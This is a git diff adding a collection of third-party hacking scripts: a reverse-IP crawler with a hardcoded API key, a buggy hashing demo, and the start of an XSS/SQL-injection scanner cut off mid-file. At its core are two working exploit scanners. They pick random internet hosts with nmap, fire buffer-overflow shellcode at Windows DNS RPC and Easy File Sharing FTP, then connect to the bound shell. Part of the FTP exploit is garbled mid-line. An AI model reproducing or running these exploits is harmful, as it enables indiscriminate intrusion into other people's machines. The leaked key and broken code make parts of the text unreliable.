diff --git a/3rdparty/0x150 v2.1.py b/3rdparty/0x150 v2.1.py new file mode 100644 index 0000000..f3ba7f4 --- /dev/null +++ b/3rdparty/0x150 v2.1.py @@ -0,0 +1,167 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- +# 0x150 Web Crawler v2.1 + +from PyQt4 import QtCore, QtGui +import socket +import urllib +import urllib2 +import mechanize +import urlparse +from xml.dom.minidom import parse, parseString +from bs4 import BeautifulSoup +import base64 +try: + _fromUtf8 = QtCore.QString.fromUtf8 +except AttributeError: + _fromUtf8 = lambda s: s +class MyOpener(urllib.FancyURLopener): + version = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15' + +class Ui_MainWindow(object): + def setupUi(self, MainWindow): + MainWindow.setObjectName(_fromUtf8("MainWindow")) + MainWindow.resize(722, 364) + self.centralwidget = QtGui.QWidget(MainWindow) + self.centralwidget.setObjectName(_fromUtf8("centralwidget")) + self.pushButton = QtGui.QPushButton(self.centralwidget) + self.pushButton.setGeometry(QtCore.QRect(320, 10, 111, 31)) + self.pushButton.setObjectName(_fromUtf8("pushButton")) + self.listView = QtGui.QListWidget(self.centralwidget) + self.listView.setGeometry(QtCore.QRect(10, 50, 301, 251)) + self.listView.setObjectName(_fromUtf8("listView")) + self.textEdit = QtGui.QLineEdit(self.centralwidget) + self.textEdit.setGeometry(QtCore.QRect(10, 10, 301, 31)) + self.textEdit.setObjectName(_fromUtf8("textEdit")) + self.textEdit.setPlaceholderText(_fromUtf8("Reverse Çek")) + self.pushButton_2 = QtGui.QPushButton(self.centralwidget) + self.pushButton_2.setGeometry(QtCore.QRect(320, 50, 111, 31)) + self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) + #self.pushButton_4 = QtGui.QPushButton(self.centralwidget) + #self.pushButton_4.setGeometry(QtCore.QRect(320, 90, 111, 31)) + #self.pushButton_4.setObjectName(_fromUtf8("pushButton_4")) + self.listView_2 = QtGui.QListWidget(self.centralwidget) + self.listView_2.setGeometry(QtCore.QRect(440, 10, 271, 291)) + self.listView_2.setObjectName(_fromUtf8("listView_2")) + self.pushButton_5 = QtGui.QPushButton(self.centralwidget) + self.pushButton_5.setGeometry(QtCore.QRect(320, 90, 111, 31)) + self.pushButton_5.setObjectName(_fromUtf8("pushButton_5")) + self.pushButton_3 = QtGui.QPushButton(self.centralwidget) + self.pushButton_3.setGeometry(QtCore.QRect(320, 270, 111, 31)) + self.pushButton_3.setObjectName(_fromUtf8("pushButton_3")) + MainWindow.setCentralWidget(self.centralwidget) + self.menubar = QtGui.QMenuBar(MainWindow) + self.menubar.setGeometry(QtCore.QRect(0, 0, 722, 29)) + self.menubar.setObjectName(_fromUtf8("menubar")) + self.menuDosya = QtGui.QMenu(self.menubar) + self.menuDosya.setObjectName(_fromUtf8("menuDosya")) + + MainWindow.setMenuBar(self.menubar) + self.statusbar = QtGui.QStatusBar(MainWindow) + self.statusbar.setObjectName(_fromUtf8("statusbar")) + MainWindow.setStatusBar(self.statusbar) + self.actionKaydet = QtGui.QAction(MainWindow) + self.actionKaydet.setObjectName(_fromUtf8("actionKaydet")) + self.actionKaydet.setShortcut('Ctrl+S') + + self.actionKaydet.triggered.connect(self.saveFile) + self.actionExit = QtGui.QAction(MainWindow) + self.actionExit.setObjectName(_fromUtf8("actionExit")) + self.actionExit.setShortcut('Ctrl+Q') + self.actionExit.triggered.connect(QtGui.qApp.quit) + self.menuDosya.addAction(self.actionKaydet) + self.menuDosya.addAction(self.actionExit) + self.menubar.addAction(self.menuDosya.menuAction()) + + self.retranslateUi(MainWindow) + QtCore.QMetaObject.connectSlotsByName(MainWindow) + QtCore.QObject.connect(self.pushButton,QtCore.SIGNAL("clicked()"),self.reverse) + QtCore.QObject.connect(self.pushButton_2,QtCore.SIGNAL("clicked()"),self.cekkeke) + # QtCore.QObject.connect(self.pushButton_4,QtCore.SIGNAL("clicked()"),self.temizle) + QtCore.QObject.connect(self.pushButton_5,QtCore.SIGNAL("clicked()"),self.temizle2) + QtCore.QObject.connect(self.pushButton_3,QtCore.SIGNAL("clicked()"),self.saveFile) + + def temizle(self): + self.listView_2.clear() + def temizle2(self): + self.listView.clear() + def cekkeke(self): + self.listView_2.clear() + self.myopener = MyOpener() + #page = urllib.urlopen(url) + self.page = self.myopener.open("http://"+ str(self.listView.currentItem().text())) + + self.text = self.page.read() + self.page.close() + + self.soup = BeautifulSoup(self.text) + + for self.tag in self.soup.findAll('a', href=True): + self.xx = self.tag["href"] + if self.xx.startswith("http://") == False and self.xx.startswith("https://")==False: + if self.xx.startswith("/")==True: + self.listView_2.addItem(self.listView.currentItem().text()+self.xx) + else: + self.listView_2.addItem(self.listView.currentItem().text()+"/"+self.xx) + def retranslateUi(self, MainWindow): + MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "0x150 Web Crawler v2.1", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton.setText(QtGui.QApplication.translate("MainWindow", "< < Reverse IP", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_2.setText(QtGui.QApplication.translate("MainWindow", "<< Crawler >>", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_3.setText(QtGui.QApplication.translate("MainWindow", "< < Kaydet >>", None, QtGui.QApplication.UnicodeUTF8)) + self.menuDosya.setTitle(QtGui.QApplication.translate("MainWindow", "Dosya", None, QtGui.QApplication.UnicodeUTF8)) + #self.menuHakk_nda.setTitle(QtGui.QApplication.translate("MainWindow", "Hakkında", None, QtGui.QApplication.UnicodeUTF8)) + self.actionKaydet.setText(QtGui.QApplication.translate("MainWindow", "Kaydet", None, QtGui.QApplication.UnicodeUTF8)) + self.actionExit.setText(QtGui.QApplication.translate("MainWindow", "Exit", None, QtGui.QApplication.UnicodeUTF8)) + #self.pushButton_4.setText(QtGui.QApplication.translate("MainWindow", "Temizle >>", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_5.setText(QtGui.QApplication.translate("MainWindow", "< < Temizle", None, QtGui.QApplication.UnicodeUTF8)) + def saveFile(self): + self.filename = QtGui.QFileDialog.getSaveFileName(None, 'Save File',"/") + self.f = open(self.filename, 'w') + self.xe = open(self.textEdit.text()+"_reverse-ip.txt","w") + items = [] + cocumuyo = [] + for index in xrange(self.listView_2.count()): + items.append(self.listView_2.item(index)) + for i in items: + #print i.text() + self.f.write(i.text()+"\n") + for ix in xrange(self.listView.count()): + cocumuyo.append(self.listView.item(ix)) + for i in cocumuyo: + self.xe.write(i.text()+"\n") + self.xe.close() + self.f.close() + #print self.listView.currentItem().text() + def reverse(self): + self.listView.addItem(self.textEdit.text()) + self.sites = [] + self.top = 50 + self.skip = 0 + self.account_key ="6XgKqcpSQqUPnODbSdOK9sOy30ng0ilUci99d5pol8I" + self.ipal = self.textEdit.text() + self.ip = socket.gethostbyname(str(self.ipal)) + while self.skip < 200: + self.url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"%(self.ip,self.top,self.skip) + self.request = urllib2.Request(self.url) + self.auth = base64.encodestring("%s:%s" % (self.account_key, self.account_key)).replace("\n", "") + self.request.add_header("Authorization", "Basic %s" % self.auth) + self.res = urllib2.urlopen(self.request) + self.data = self.res.read() + self.xmldoc = parseString(self.data) + self.site_list = self.xmldoc.getElementsByTagName('d:Url') + for self.site in self.site_list: + self.domain = self.site.childNodes[0].nodeValue + self.domain = self.domain.split("/")[2] + if self.domain not in self.sites: + self.sites.append(self.domain) + self.skip += 50 + for self.xs in self.sites: + self.listView.addItem(self.xs) +if __name__ == "__main__": + import sys + app = QtGui.QApplication(sys.argv) + MainWindow = QtGui.QMainWindow() + ui = Ui_MainWindow() + ui.setupUi(MainWindow) + MainWindow.show() + sys.exit(app.exec_()) \ No newline at end of file diff --git a/3rdparty/Crypter.py b/3rdparty/Crypter.py new file mode 100644 index 0000000..c0615a0 --- /dev/null +++ b/3rdparty/Crypter.py @@ -0,0 +1,66 @@ +from Crypto.Hash import HMAC +from Crypto.Hash import MD2 +from Crypto.Hash import MD4 +from Crypto.Hash import MD5 +from Crypto.Hash import RIPEMD +from Crypto.Hash import SHA +from Crypto.Hash import SHA256 + + + + ######## + #B3mB4m# + ######## + + +#Hi guyss im B3mB4m to day topic how to use PyCrypto - The Python Cryptography Toolkit ? !! + +# You can see codes here, but � want change somethins + +word = raw_input("Give me the word : ") + + +""" + +from Crypto.Hash import HMAC +from Crypto.Hash import MD2 +from Crypto.Hash import MD4 +from Crypto.Hash import MD5 +from Crypto.Hash import RIPEMD +from Crypto.Hash import SHA +from Crypto.Hash import SHA256 + +HMAC-MD2-MD4-MD5-SHA-SHA526-RIPEMD .. now lets try + + +""" + + +secret = b'B3mB4m' +h = HMAC.new(secret) +h.update(word) +print "HMAC = "+h.hexdigest() + +h2 = MD2.new() +h2.update(word) +print "MD2 = "+h2.hexdigest() + +h3 = MD4.new() +h3.update(word) +print "MD4 = "+h3.hexdigest() + +h4 = MD5.new() +h4.update(word) +print "MD5 = "+h3.hexdigest() + +h5 = RIPEMD.new() +h5.update(word) +print "RIPEMD = "+h5.hexdigest() + +h6 = SHA.new() +h6.update(word) +print "SHA = "+h6.hexdigest() + +h7 = SHA.new() +h7.update(word ) +print "SHA256 = "+h7.hexdigest() diff --git a/3rdparty/DNSRPCscanner.py b/3rdparty/DNSRPCscanner.py new file mode 100644 index 0000000..4787401 --- /dev/null +++ b/3rdparty/DNSRPCscanner.py @@ -0,0 +1,178 @@ +#!/usr/bin/python +#This is a Windows DNS RPC service scanner for the new exploit #http://www.milw0rm.com/exploits/3737, uses nmap to locate win2000 machines +#and if found continues to use the exploit. Threw in a little threading to speed +#the process up. Remove the 2000 and whitespace in between at line 137 to exploit +#all windows machines found. I noticed for this exploit you need impacket for it +#to work properly, http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz +#download that, untar, cd, su root, python setup.py install +#thats it... + +#!!! You need to be root for the nmap flags to work properly !!! + +# Remote exploit for the 0day Windows DNS RPC service vulnerability as +# described in http://www.securityfocus.com/bid/23470/info. Tested on +# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 +# and then connects to it. +# +# Cheers to metasploit for the first exploit. +# Written for educational and testing purposes. +# Author shall bear no responsibility for any damage caused by using this code +# Winny Thomas :-) + +import os, StringIO, re, random, commands, sys, time, thread +try: + from impacket.dcerpc import transport, dcerpc, epm + from impacket import uuid +except(ImportError): + print "\nYou need the Impacket Module" + print "http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz\n" + sys.exit(1) + +#Portbind shellcode from metasploit; Binds port to TCP port 4444 +shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" +shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" +shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" +shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" +shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" +shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" +shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" +shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" +shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" +shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" +shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" +shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" +shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" +shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" +shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" +shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" +shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" +shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" +shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" +shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" +shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" +shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" +shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" + +# Stub sections taken from metasploit +stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' +stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00' +stub += '\x00\x00\x00\x00\x12\x05\x00\x00' +stub += '\\A' * 465 +# At the time of overflow ESP points into our buffer which has each char +# prepended by a '\' and our shellcode code is about 24+ bytes away from +# where EDX points +stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll +# The following B's which in assembly translates to 'inc EDX' increments +# about 31 times EDX so that it points into our shellcode +stub += '\\B' * 43 +# Translates to 'jmp EDX' +stub += '\\\xff\\\xe2' +stub += '\\A' * 134 +stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00' +stub += '\x03\x00\x00\x00\x47\x00\x00\x00' +stub += shellcode + +def timer(): + now = time.localtime(time.time()) + return time.asctime(now) + +# Code ripped from core security document on impacket +# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf +# Not a neat way to discover a dynamic port :-) +def DiscoverDNSport(target): + trans = transport.SMBTransport(target, 139, 'epmapper') + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0'))) + pm = epm.DCERPCEpm(dce) + handle = '\x00'*20 + while 1: + dump = pm.portmap_dump(handle) + if not dump.get_entries_num(): + break + handle = dump.get_handle() + entry = dump.get_entry().get_entry() + if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'): + port = entry.get_string_binding().split('[')[1][:-1] + return int(port) + + print '[-] Could not locate DNS port; Target might not be running DNS' + +def ExploitDNS(target, port): + trans = transport.TCPTransport(target, port) + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0'))) + + dce.call(0x01, stub) + +def ConnectRemoteShell(target): + connect = "/usr/bin/telnet " + target + " 4444" + os.system(connect) + + +def Worker(): + + global num + global found + + nmap = StringIO.StringIO(commands.getstatusoutput('nmap -T 3 -O --host-timeout 35s --osscan-guess -iR 1')[1]).readlines() #Change your nmap flags if needed + + for tmp in nmap: + if re.search("QUITTING!",tmp): + print '[-] You must run this script as root for the nmap flags to work properly!!!' + print 'Type: Ctrl-C\n' + sys.exit(1) + ip = re.findall("\d*\.\d*\.\d*\.\d*", tmp) + if ip: + target = ip[0] + print "Searching:",target + for tmp in nmap: + if re.search("Aggressive OS guesses:", tmp): + os = tmp.split(",",1)[0].replace("Aggressive OS guesses:","") + if os: + os = re.sub(r'\(\d+%\)',"",os,1) + print "\tFound:",os + num +=1 + if re.search("Windows 2000",os): #Take out the 2000 to exploit all windows found machines + found.append(target+" : "+os) + print "\tFound a Win2000 machine:",os + print '\n[+] Locating DNS RPC port' + port = DiscoverDNSport(target) + print '[+] Located DNS RPC service on TCP port: %d' % port + ExploitDNS(target, port) + print '[+] Exploit sent. Connecting to shell in 3 seconds' + time.sleep(3) + ConnectRemoteShell(target) + +if len(sys.argv) != 2: + print "\n\t d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0" + print "\t--------------------------------------------------" + print "\n\tUsage: ./DNSRPCscanner.py \n" + print "\tEx. ./DNSRPCscanner.py 10000\n" + sys.exit(1) + +else: + print "\n d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0" + print "--------------------------------------------------" + print "[+] Scanning: 0day Windows DNS RPC service vulnerability" + print "[+] Targets:",int(sys.argv[1]) + print "[+] Starting:",timer(),"\n" + print "[+] Scanning...\n" + found = [] + num = 0 + for x in range(10): + for i in range(int(sys.argv[1])/10): + time.sleep(random.randint(1, 3)) + work = thread.start_new_thread(Worker, ()) +print "\n[-] Scanning Complete:",timer() +print "[-] Found:",num,"o-systems" +print "[-] Found:",len(found),"using win2k\n" +if len(found) >=1: + print "[-] Target List:\n" + for os in found: + print os + + + + diff --git a/3rdparty/EFSscan.py b/3rdparty/EFSscan.py new file mode 100644 index 0000000..cb94578 --- /dev/null +++ b/3rdparty/EFSscan.py @@ -0,0 +1,146 @@ +#!/usr/bin/python +#Modified Winny Thomas EFS exploit to scan(uses nmap) for random open ftp ports then +#check the banner for EFS server, if found, exploit it... +#http://www.milw0rm.com/exploits/3579 +#d3hydr8[at]gmail[dot]com + +# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability +# was discovered by h07 and a POC for windows XP SP2 (polish version) was +# provided. This exploit was tested on windows 2000 server SP4. The exploit +# binds a shell on TCP port 4444. +# +# Author shall bear no responsibility for any screw ups +# Winny Thomas :-) + +import os +import sys +import time +import struct +import socket +import StringIO, re, commands + +shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" +shellcode += "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x48\x45\x34\x4e\x33\x4b\x38\x4e\x37" +shellcode += "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" +shellcode += "\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38" +shellcode += "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" +shellcode += "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" +shellcode += "\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x52\x45\x47\x45\x4e\x4b\x58" +shellcode += "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x34" +shellcode += "\x4b\x38\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48" +shellcode += "\x49\x38\x4e\x46\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d" +shellcode += "\x46\x36\x4b\x48\x43\x34\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x58" +shellcode += "\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x35\x48\x36\x4a\x36\x43\x43\x44\x43\x4a\x36\x47\x37\x43\x57" +shellcode += "\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" +shellcode += "\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" +shellcode += "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44" +shellcode += "\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x31" +shellcode += "\x4e\x45\x48\x36\x43\x55\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d" +shellcode += "\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56" +shellcode += "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55" +shellcode += "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x46\x4a\x36\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x35\x49\x32\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x44\x4e\x32" +shellcode += "\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" +shellcode += "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46" +shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x46" +shellcode += "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f" +shellcode += "\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" +shellcode += "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x36\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a" + +def ConnectRemoteShell(target): + connect = "/usr/bin/telnet " + target + " 4444" + os.system(connect) + +def ExploitFTP(target): + sockAddr = (target, 21) + tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + tsock.connect(sockAddr) + response = tsock.recv(1024) + print response + + # At the time of overflow EBX points into our shellcode + payload = 'A' * 2553 + # NOP's pad with a 15 byte jump over some junk and the RET address + # Jumps into our shellcode + payload += '\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f' + # Address of 'call ebx' from kernel32.dll SP4 + payload += struct.pack('" + sys.exit(1) +else: + num=sys.argv[1] + + print "\n d3hydr8[at]gmail[dot]com EFSScan v1.0" + print "--------------------------------------------------" + print "+ Target: Easy File Sharing FTP server V2.0" + print "+ Target port: 21" + print "+ Scanning:",num,"\n" + + count = 0 + while count != int(num): + count += 1 + print "Trying:",count,"of",num + #Change your nmap arguments, if you want. + nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -p 21 -iR 1 | grep -B 4 open')[1]).readlines() + for tmp in nmap: + if re.search("21/tcp\s+(?=open)", tmp): + port = int(21) + for tmp in nmap: + ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp) + if ipaddr: + host = ipaddr[0] + print "\n- Found port open on",host,"checking banner." + + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(10) + s.connect((host, port)) + time.sleep(7) + s.send("\r\n") + response = s.recvfrom(1024)[0] + s.close() + #Change this to whatever EFS banner looks like. (use lowercase) + if re.search("easy file", response.lower()): + print "\n\t\tEFS server found in banner, attempting to exploit...\n" + ExploitFTP(host) + else: print "\tNo Match:",response,"\n" + except(socket.error,NameError), msg: + print "\tAn error occurred:", msg,"\n" + s.close() +# milw0rm.com [2006-08-26] + diff --git a/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py b/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py new file mode 100644 index 0000000..ecf42d7 --- /dev/null +++ b/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py @@ -0,0 +1,1041 @@ +#!/usr/bin/python + +# VulnDetector Version 0.0.1pa +# Author: Brad Cable +# License: GPL Version 2 + + +## basic config - these need to be changed depending on the site to be scanned ## + +site="http://www.site.com/" # URL to tree/scan +domains=[".site.com",".site2.com"] # whitelist of domains to scan, with a "." infront, it matches all subdomains as well +pagetype="php" # type of code used on the site being scanned ("php" or "asp") + +# log locations, all logs are stored at [the current directory]/logs/LOGFILE +vulnlogfile="gfqlog" # file to log all detected vulnerabilities as they are encountered +urllogfile="gfqurllog" # file to log all urls fetched as they are fetched +reportfile="gfqreport" # at the end of the scan, the detected vulnerabilities are compiled into a neat list, and logged to this file +usecookies=True # whether or not to send a cookie header value each time (True or False) +cookies="" # if usecookies is True, then + +## end basic config ## + + + + + +## advanced config - only change these if you know what you are doing, you really shouldn't need to touch these at all... ## + +xssscan=True # scan for XSS vulns (True or False) +sqliscan=True # scan for SQLI vulns (True or False) + +checklevel=1 # checklevel: + # 1 = Silent SQL, Silent XSS + # 2 = Silent SQL, Silent XSS when possible (semi-silent when not) + # 3 = BLAST THE SITE! (AKA, non Silent SQL, non Silent XSS, causes tons of MySQL Errors + # on the site and could possibly flood someone's admin email) + +levels=7 # levels deep to tree the site (I recommend 6-8; 6 is shorter, and fairly thorough, while 8 is just plain crazy long and a little too thorough) +ignore_subdomain=True # ignore subdomains for HTTP Host field and other places (should leave as True) + +scanlimit=5 # times to scan the same URL with different query strings, + # "bob.php?id=1" and "bob.php?id=2" count as two scans, + # and until scanlimit is hit, it will continue to check + # vulnerabilities on that URL + +indent=" " # indent used when displaying the results +ignorefileext="swf,fla,gif,jpeg,jpg,tiff,png,mng,pdf,dat,mpeg,mpg,mp2,mp3,wav,mod,mov,avi,asf,asx,ogg,asc,tgz,rpm,deb,gz,bz2,zip,rar,c,cpp,h,o,ko,py,so,torrent,js,css,msi,exe,bin,dmg,x86,ut4mod,wmv,rmvb,txt,n64,cbs,max,xps,xpi" # list of file extensions that shouldn't be downloaded and scanned + +randidentlen=6 # this is so internal, you shouldn't touch it whatsoever +decapitation=True # this is so internal, you shouldn't touch it whatsoever + +## end advanced config ## + + +######################################## +### DO NOT TOUCH THE REST!!! ### +######################################## + +## setup ## + +# import modules +import socket,sre,time,random + +# debugging +from sys import exit # exit() for debug +# debug mode +from sys import argv +debug=False +if len(argv)>=2: debug=(argv[1]=="1") + +# declare output variables +urlfields={} +postfields={} +treedurls={} +reportvar={} + +# get comment type to use +if pagetype=="asp": comnt="%2d%2d" +elif pagetype=="php": comnt="/*" +else: + print "Unknown Page Type: "+pagetype.upper() + print "Using Default Database Comment: --" + comnt="%2d%2d" + +# get session stuff to use +sessstr="(?i)" +if pagetype=="asp": sessstr+="aspsessionid([a-z]{8})=([a-z]{8})" +elif pagetype=="php": sessstr+="phpsessid=([a-z0-9]{32})" +else: + print "Unknown Page Type: "+pagetype.upper() + sessstr+=pagetype+"sessid=([a-z0-9]{32})" + print "Using Default Session Syntax: --" + +# set up the ignore file extension variable to be useable +ignorefileext=","+ignorefileext+"," + +## end setup ## + + +## function declaration ## + +# function to determine if a list object is empty in any way +def listempty(listarg): return (listarg==None or listarg==[] or type(listarg)!=type([]) or len(listarg)==0) + +# function to edit files easily +def filestuff(fname,body="",fptype=False): + + if not fptype: + if body=="": fptype="r" + else: fptype="a" + + fp=open(fname,fptype) + fp.write(str(body)) + fp.close() + +# function to remove non unique items +def uniqlist(listarg): + if type(listarg)!=type([]): return + newlist=[] + for i in range(len(listarg)): + if newlist.count(listarg[i])==0: newlist[len(newlist):len(newlist)]=[listarg[i]] + return newlist + +# function to get the page name of a url +def pagename(url): + if url[:7]=="http://": url=url[7:] + slash=url.find("/") + if slash!=-1: url=url[slash:] + else: url="/" + return url + +# function to fix urls like "http://www.google.com" or "www.google.com" into 